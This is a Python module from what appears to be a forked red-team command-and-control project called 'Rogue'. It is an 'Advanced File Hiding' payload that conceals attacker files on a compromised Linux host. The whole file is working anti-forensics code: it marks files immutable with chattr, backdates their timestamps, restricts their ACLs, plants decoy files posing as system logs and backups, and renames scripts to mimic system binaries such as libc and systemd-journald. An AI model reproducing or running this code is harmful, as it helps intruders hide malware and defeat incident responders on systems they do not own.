forked from ek0mssavi0r/Rogue
186 lines
7.3 KiB
Python
186 lines
7.3 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
PAYLOAD: Advanced File Hiding
|
|
DESCRIPTION: Hide files using multiple methods (extended attributes, ACLs, etc.)
|
|
AUTHOR: Rogue Red Team
|
|
VERSION: 2.0
|
|
"""
|
|
import os, subprocess, stat, time, random, string, hashlib, json
|
|
from datetime import datetime
|
|
|
|
class AdvancedFileHider:
|
|
def __init__(self, hidden_dir=None):
|
|
self.hidden_dir = hidden_dir or os.path.expanduser("~/.cache/.rogue")
|
|
self.hidden_files = []
|
|
|
|
def hide_with_extended_attributes(self):
|
|
"""Hide files using extended attributes"""
|
|
try:
|
|
for root, dirs, files in os.walk(self.hidden_dir):
|
|
for file in files:
|
|
filepath = os.path.join(root, file)
|
|
|
|
# Set immutable flag (chattr +i)
|
|
subprocess.call(f'chattr +i "{filepath}" 2>/dev/null', shell=True)
|
|
|
|
# Set hidden extended attribute
|
|
subprocess.call(f'setfattr -n user.hidden -v 1 "{filepath}" 2>/dev/null', shell=True)
|
|
|
|
# Set creation date to past
|
|
past_time = time.time() - (365 * 24 * 60 * 60) # 1 year ago
|
|
os.utime(filepath, (past_time, past_time))
|
|
|
|
self.hidden_files.append({
|
|
'path': filepath,
|
|
'method': 'extended_attrs',
|
|
'timestamp': datetime.now().isoformat()
|
|
})
|
|
|
|
return f"[+] Applied extended attributes to {len(self.hidden_files)} files"
|
|
|
|
except Exception as e:
|
|
return f"[!] Extended attribute hiding failed: {e}"
|
|
|
|
def hide_with_acls(self):
|
|
"""Hide files using Access Control Lists"""
|
|
try:
|
|
for root, dirs, files in os.walk(self.hidden_dir):
|
|
for file in files:
|
|
filepath = os.path.join(root, file)
|
|
|
|
# Remove read permissions for 'other'
|
|
os.chmod(filepath, stat.S_IRUSR | stat.S_IWUSR)
|
|
|
|
# Set ACL to hide from certain users
|
|
subprocess.call(f'setfacl -m u:nobody:--- "{filepath}" 2>/dev/null', shell=True)
|
|
subprocess.call(f'setfacl -m g:nogroup:--- "{filepath}" 2>/dev/null', shell=True)
|
|
|
|
self.hidden_files.append({
|
|
'path': filepath,
|
|
'method': 'acls',
|
|
'timestamp': datetime.now().isoformat()
|
|
})
|
|
|
|
return f"[+] Applied ACL restrictions to {len(self.hidden_files)} files"
|
|
|
|
except Exception as e:
|
|
return f"[!] ACL hiding failed: {e}"
|
|
|
|
def create_decoy_files(self):
|
|
"""Create legitimate-looking decoy files"""
|
|
decoys = [
|
|
('system_logs.tar.gz', 'Compressed system logs'),
|
|
('kernel_backup.bin', 'Kernel backup file'),
|
|
('config_backup.tar', 'Configuration backup'),
|
|
('tmp_cache.dat', 'Temporary cache file')
|
|
]
|
|
|
|
try:
|
|
decoy_dir = os.path.join(self.hidden_dir, ".decoy")
|
|
os.makedirs(decoy_dir, exist_ok=True)
|
|
|
|
for filename, content in decoys:
|
|
filepath = os.path.join(decoy_dir, filename)
|
|
with open(filepath, 'w') as f:
|
|
f.write(f"# {content}\n")
|
|
f.write("# Generated: " + datetime.now().isoformat() + "\n")
|
|
f.write("# " + "="*50 + "\n")
|
|
f.write("# This appears to be a legitimate system file\n")
|
|
|
|
# Make them look old
|
|
old_time = time.time() - (random.randint(30, 180) * 24 * 60 * 60)
|
|
os.utime(filepath, (old_time, old_time))
|
|
|
|
self.hidden_files.append({
|
|
'path': filepath,
|
|
'method': 'decoy',
|
|
'timestamp': datetime.now().isoformat()
|
|
})
|
|
|
|
return f"[+] Created {len(decoys)} decoy files"
|
|
|
|
except Exception as e:
|
|
return f"[!] Decoy creation failed: {e}"
|
|
|
|
def obfuscate_filenames(self):
|
|
"""Obfuscate file names to look like system files"""
|
|
try:
|
|
system_like_names = [
|
|
'libc-2.31.so',
|
|
'ld-linux-x86-64.so.2',
|
|
'modules.alias.bin',
|
|
'initrd.img',
|
|
'vmlinuz',
|
|
'systemd-journald',
|
|
'dbus-daemon',
|
|
'NetworkManager'
|
|
]
|
|
|
|
file_map = {}
|
|
for root, dirs, files in os.walk(self.hidden_dir):
|
|
for file in files:
|
|
if file.endswith('.py') or file.endswith('.log'):
|
|
old_path = os.path.join(root, file)
|
|
new_name = random.choice(system_like_names)
|
|
new_path = os.path.join(root, new_name)
|
|
|
|
os.rename(old_path, new_path)
|
|
file_map[old_path] = new_path
|
|
|
|
self.hidden_files.append({
|
|
'old_path': old_path,
|
|
'new_path': new_path,
|
|
'method': 'obfuscation',
|
|
'timestamp': datetime.now().isoformat()
|
|
})
|
|
|
|
# Save mapping for recovery
|
|
map_file = os.path.join(self.hidden_dir, ".filemap.json")
|
|
with open(map_file, 'w') as f:
|
|
json.dump(file_map, f, indent=2)
|
|
|
|
# Hide the map file
|
|
subprocess.call(f'chattr +i "{map_file}" 2>/dev/null', shell=True)
|
|
|
|
return f"[+] Obfuscated {len(file_map)} filenames"
|
|
|
|
except Exception as e:
|
|
return f"[!] Filename obfuscation failed: {e}"
|
|
|
|
def execute(self):
|
|
"""Execute all hiding techniques"""
|
|
try:
|
|
print("[+] Starting advanced file hiding operations...")
|
|
|
|
results = []
|
|
results.append(self.hide_with_extended_attributes())
|
|
results.append(self.hide_with_acls())
|
|
results.append(self.create_decoy_files())
|
|
results.append(self.obfuscate_filenames())
|
|
|
|
# Save hiding report
|
|
report_file = os.path.join(self.hidden_dir, ".hiding_report.json")
|
|
with open(report_file, 'w') as f:
|
|
json.dump({
|
|
'hidden_files': self.hidden_files,
|
|
'timestamp': datetime.now().isoformat(),
|
|
'total_files': len(self.hidden_files)
|
|
}, f, indent=2)
|
|
|
|
# Hide the report
|
|
subprocess.call(f'chattr +i "{report_file}" 2>/dev/null', shell=True)
|
|
|
|
return "\n".join(results)
|
|
|
|
except Exception as e:
|
|
return f"[!] Advanced file hiding failed: {e}"
|
|
|
|
# === Integration with Rogue C2 ===
|
|
def rogue_integration():
|
|
"""Wrapper for Rogue C2 integration"""
|
|
hider = AdvancedFileHider()
|
|
return hider.execute()
|
|
|
|
if __name__ == "__main__":
|
|
print(rogue_integration())
|